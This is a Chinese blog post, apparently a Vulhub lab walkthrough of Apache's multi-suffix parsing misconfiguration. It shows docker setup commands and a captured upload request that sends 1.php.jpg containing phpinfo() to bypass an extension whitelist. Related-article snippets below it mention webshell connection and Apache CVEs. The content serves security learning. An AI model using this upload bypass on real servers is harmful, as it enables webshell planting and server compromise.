Apache解析漏洞~ apache_parsing漏洞分析

最新推荐文章于 2024-08-08 14:33:52 发布
最新推荐文章于 2024-08-08 14:33:52 发布
阅读量239 收藏 1
点赞数 9
文章标签: apache 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/140855398
版权

在这里插入图片描述

Apache解析漏洞

apache_parsing

在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。如 1.php.xxxxx

漏洞原理

# Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如如下配置文件:
AddType text/html .html
AddLanguage zh-CN .cn

# 其给 .html 后缀增加了 media-type ,值为 text/html ;给 .cn 后缀增加了语言,值为 zh-CN 。此时,如果用户请求文件 index.cn.html ,他将返回一个中文的html页面。以上就是Apache多后缀的特性。如果运维人员给 .php 后缀增加了处理器:
AddHandler application/x-httpd-php .php .php3 .phtml

那么,在有多个后缀的情况下,只要一个文件含有 .php 后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。

利用姿势

步骤一:进入Vulhub靶场并执行以下命令启动靶场…

cd /vulhub/httpd/apache_parsing_vulnerability   
vim docker-compose.yml //编文件第一行删除掉
docker-compose build //创建文件
docker-compose up -d //拉取镜像
docker ps -a      //查看端口

步骤二:访问靶机并上传 1.php.jpg 文件,文件内容为 phpinfo 函数…进行抓包…

POST / HTTP/1.1
Host: 101.42.118.221
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/110.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*
/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=--------------------------
-13126981399916040642324260341
Content-Length: 260
Origin: http://101.42.118.221
Connection: close
Referer: http://101.42.118.221/
Upgrade-Insecure-Requests: 1
-----------------------------13126981399916040642324260341
Content-Disposition: form-data; name="file_upload"; filename="1.php.jpg"
Content-Type: application/octet-stream
<?php phpinfo();?>
-----------------------------13126981399916040642324260341--

image-20240801181638991

步骤三:上传成功后与网站进行路径拼接…如下:

http://192.168.66.131/uploadfiles/1.php.jpg

image-20240801181733214
好小子,离成功又近一步!!!

蚂蚱.top
关注
yf.rar_Follow_ Follow_parsing table_预测分析
09-19
构造实验一所给文法(应考虑改造)的FIRST集合和FOLLOW...利用分析表、分析栈和总控程序对源程序进行自上而下的语法分输出整个语法分析过程中栈的变化过程及分析结果,如符合语法规则输出“正确”,否则输出“错误”。
文件解析漏洞——Apache文件解析漏洞
weixin_54055099的博客
09-22 968
Apache文件解析漏洞
Apache文件解析漏洞
weixin_53696027的博客
02-27 1304
通过Ubuntu对Apache文件解析漏洞进行复现
vulhub:Apache解析漏洞apache_parsing
weixin_68416970的博客
08-01 577
vulhub漏洞复现:Apache解析漏洞apache_parsing
中间件解析漏洞Apache解析漏洞原理和复现
A526847的博客
06-04 1675
在windows下,会直接根据最后的.来进 行分隔,将其判定为doc文件,但在apache中可不是这样的,apache会从后往前依次进行判别,遇到不 认识的后缀,便会往前读,如果还是不认识再往前,若是到最后一个都不认识,则会将该文件当成默认 类型文件读取。在2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,shell.php\x0A将被按照PHP后缀进行解析, 导致绕过一些服务器的安全策略。这种情况,多后缀的文件名中只要存在.php后缀,则就会将该文件当做php文件解析
Apache Httpd 常见漏洞解析(全)
黑战士的博客
02-17 3635
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache HTTPD 多后缀解析漏洞
qq_23003811的博客
07-15 324
Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。该漏洞并不是apache程序本身的问题,而是管理员配置不当造成。重命名为phpinfo.php.png然后上传。1、制作一个phpinfo.php文件内容为。3、获取falg,修改图片代码,然后上传。通过中国蚁剑等工具进行连接。
html.rar_htmlparser_java parsing html
09-24
我们可以创建一个Java类,使用HTMLParser来解析这个文件: ```java import com.htmlparser.Parser; import com.htmlparser.beans.TagBean; import com.htmlparser.nodes.TagNode; import java.io.File; import ...
Calculate.rar_formula_parsing source
09-19
"Calculate.rar_formula_parsing source" 提供的源代码可能是一个实现公式解析的工具或库,这对于我们理解和构建自己的计算逻辑或自定义功能非常有帮助。公式解析源码通常涉及到编译原理和解析技术,包括词法分析、...
human_vehicle_parsing_platform:用于人员解析和车辆解析的pytorch代码库
02-04
parsing_platform 一个用于人解析和车辆解析的pytorch代码库。介绍一个用于人解析和车辆解析的pytorch代码库。要求python≥3.6Linux或macOS PyTorch = 0.4.1 与Pytorch安装匹配的torchvision。 您可以在它们安装在...
arp-parse_arp_parsing_Perl_
09-30
标题“arp-parse_arp_parsing_Perl_”和描述“test Windows shares to access”提示我们,这个主题涉及使用Perl语言进行ARP(地址解析协议)解析,并且可能与测试Windows共享资源的访问有关。ARP是网络层协议,用于...
Apache、Nginx、IIS文件解析漏洞
qq_68163788的博客
05-29 1369
文件解析漏洞是指在Web服务器(如Apache、Nginx、IIS)中存在的一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或获取敏感信息。这种漏洞通常涉及服务器错误地解释用户输入的文件或数据,导致攻击者能够访问服务器上的文件系统、执行任意代码或进行其他未经授权的操作。攻击者通常会尝试通过构造特定的恶意请求来利用文件解析漏洞,从而绕过服务器的安全控制机制。
Apache漏洞大全(附修复方法)
最新发布
C233333235的博客
08-08 913
一.文件解析Apache 是世界使⽤排名第⼀的 Web 服务器软件。它可以运⾏在⼏乎所有⼴泛使⽤的计算机平台上,由于其跨平台和安全性被⼴泛使⽤,是最流⾏的 Web 服务器端软件之⼀。一.文件解析漏洞复现环境搭建命令如下打开并访问靶机后,我们上传一个名为1.php.jpg的文件,内容为可以直接上传成功,我们尝试访问后也成功访问然后尝试用蚁剑连接,发现连接成功。
11-3 Apache多后缀解析漏洞分析
weixin_43263566的博客
11-24 1644
漏洞与用户的配置有密切的关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到 Apache 解析文件的特性。在默认情况下,Apache 允许一个文件具有多个以点分割的后缀,在处理文件时会从右向左识别后缀名。(就是右边的后缀名无法识别,则继续识别左边的)如果运维人员给具有 .php 后缀的文件添加了处理程序 AddHandler application/x-httpd-php .php,那么在文件具有多个后缀的情况下,只要文件含有 .php 后缀,该文件就会被识别为 PHP 文件并进行解析
Apache解析漏洞
热门推荐
weixin_44174581的博客
08-04 1万+
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准) 1. 如图,最后一个后缀名为.xxx,不合法,所以向左看,.php为合法后缀,所以以.php格式解析,可用来绕过黑名单过滤 2.AddHandler导致的解析漏洞 如果服务器给.php后缀添加了处理器:AddHandler application/x-httpd-php.php 那么,在有多个后缀
Apache两个解析漏洞复现及防御方法
阿道夫的博客
01-28 3507
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
httpd已复现漏洞
qq_61142406的博客
05-28 806
CVE-2017-15715: 2.4.0~2.4.29 00截断,后缀名后面加0A,1.php后面加上一个空格,然后双击空格,右边出现hex进制,然后改成0A CVE-2021-41773: 目录穿越,Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录,配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。 文件读取 payl
apache文件解析漏洞
weixin_59872639的博客
03-08 2500
环境介绍 Apache文件解析漏洞与用户的配置有密切关系。严格来说,属于用户配置问题,这里要讲解配置出错的原因以及修复方法,所以需要准备漏洞复现环境。 使用ubuntu的docker准备实验 拉取ubuntu镜像以及更新源 docker pull ubuntu:18.04 //拉取ubuntu镜像 docker run --name apachejs -itd -p 80:80 ubuntu:18.04 //启动镜像 docker ps //查看已开启容器信息 docker ex
ActiveMQ与Apache HTTPD安全漏洞深度解析
5. Apache HTTPD未知后缀解析漏洞:攻击者可以利用此漏洞解析非预期的文件扩展,可能导致敏感信息泄露或恶意代码执行。漏洞实例存储在/data/vulhub/httpd/apache_parsing_vulnerability/。 6. Apache SSI远程命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值